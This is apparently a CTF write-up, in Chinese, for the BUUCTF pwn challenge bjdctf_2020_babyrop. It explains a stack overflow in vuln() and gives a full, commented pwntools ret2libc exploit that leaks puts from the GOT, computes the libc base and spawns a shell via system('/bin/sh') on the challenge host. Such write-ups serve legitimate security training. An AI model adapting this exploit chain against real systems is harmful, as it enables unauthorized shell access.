1.例行检查保护机制
2. 我们用64位的IDA打开该文件
shift+F12 查看字符串窗口,没有找到关键字符串
3.我们进入main函数看看
发现有两个函数
init():这里打印了两句话
vuln():打印了一句话,然后我们看到 read() 往 buf 里读取了 0x64 个字节,但是 buf 只有 0x20 个字节,所以这里存在栈溢出漏洞
4.system("/bin/sh")
我们用泄露出来的 puts 地址和 libc 中的偏移计算出 libc 基址,再计算 system 和 "/bin/sh" 的地址
base_addr = puts_addr - libc_puts_addr
system_addr = base_addr + libc_system_addr
bin_addr = base_addr + libc_bin_addr
5.EXP
#encoding = utf-8
from pwn import *
from LibcSearcher import *
# Module-level settings shared by main(): which instance to talk to,
# the pwntools global context, and the target ELF (non-PIE binary whose
# symbol/plt/got addresses are used directly).
content = 0  # 0 -> remote instance, 1 -> local process
context.update(os='linux', arch='amd64', log_level='debug')
elf = ELF(path='./bjdctf_2020_babyrop')
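def main():
    """Run the two-stage ret2libc chain against bjdctf_2020_babyrop.

    The bug is in vuln(): read() accepts 0x64 bytes into a 0x20-byte stack
    buffer, so the saved return address is overwritable (the program-side
    fix is to bound the read() length to the buffer size).  Stage 1 uses
    the overflow to call puts(puts@got) and return to main, which leaks the
    runtime address of puts; stage 2 reuses the overflow with the derived
    libc base to call system("/bin/sh").

    Uses the module-level ``content`` switch and ``elf`` object.

    Returns:
        None; control is handed to the user via ``p.interactive()``.
    """
    if content == 1:
        # Reuse the path the ELF object was loaded from.  The original passed
        # a bare file name, which pwntools appears to resolve via PATH rather
        # than the current directory (confirm against the pwntools version
        # in use), so the local branch could never find the binary.
        p = process(elf.path)
    else:
        p = remote('node4.buuoj.cn', 29917)

    # Static addresses from the non-PIE binary.
    main_addr = elf.sym['main']
    plt_addr = elf.plt['puts']
    got_addr = elf.got['puts']
    pop_rdi = 0x0400733   # pop rdi ; ret
    ret_addr = 0x04004c9  # ret

    # 0x20 bytes of buffer plus 8 bytes of saved rbp sit before the return
    # address; both stages share the same padding and the same prompt.
    padding = b'a' * (0x20 + 0x8)
    prompt = b"Pull up your sword and tell me u story!\n"

    # Stage 1: puts(puts@got), then back into main for a second overflow.
    payload = padding + p64(pop_rdi) + p64(got_addr) + p64(plt_addr) + p64(main_addr)
    p.recvuntil(prompt)
    p.sendline(payload)
    # puts stops at the first NUL; a 64-bit userland pointer therefore
    # prints as 6 bytes, which are zero-extended to a full qword.
    puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
    log.success('puts@libc = %#x', puts_addr)

    # Identify the remote libc from the leaked puts and rebase the symbols.
    lib = LibcSearcher('puts', puts_addr)
    base_addr = puts_addr - lib.dump('puts')
    system_addr = base_addr + lib.dump('system')
    bin_addr = base_addr + lib.dump('str_bin_sh')

    # Stage 2: system("/bin/sh").  The extra `ret` is the usual way to keep
    # rsp 16-byte aligned on entry to system() (newer glibc faults on a
    # misaligned movaps otherwise) — presumably why the author added it.
    payload = padding + p64(ret_addr) + p64(pop_rdi) + p64(bin_addr) + p64(system_addr)
    p.recvuntil(prompt)
    p.sendline(payload)
    p.interactive()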
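# Guard the entry point so importing this file (e.g. to reuse the
# address constants) does not fire the exploit against the remote host.
if __name__ == "__main__":
    main()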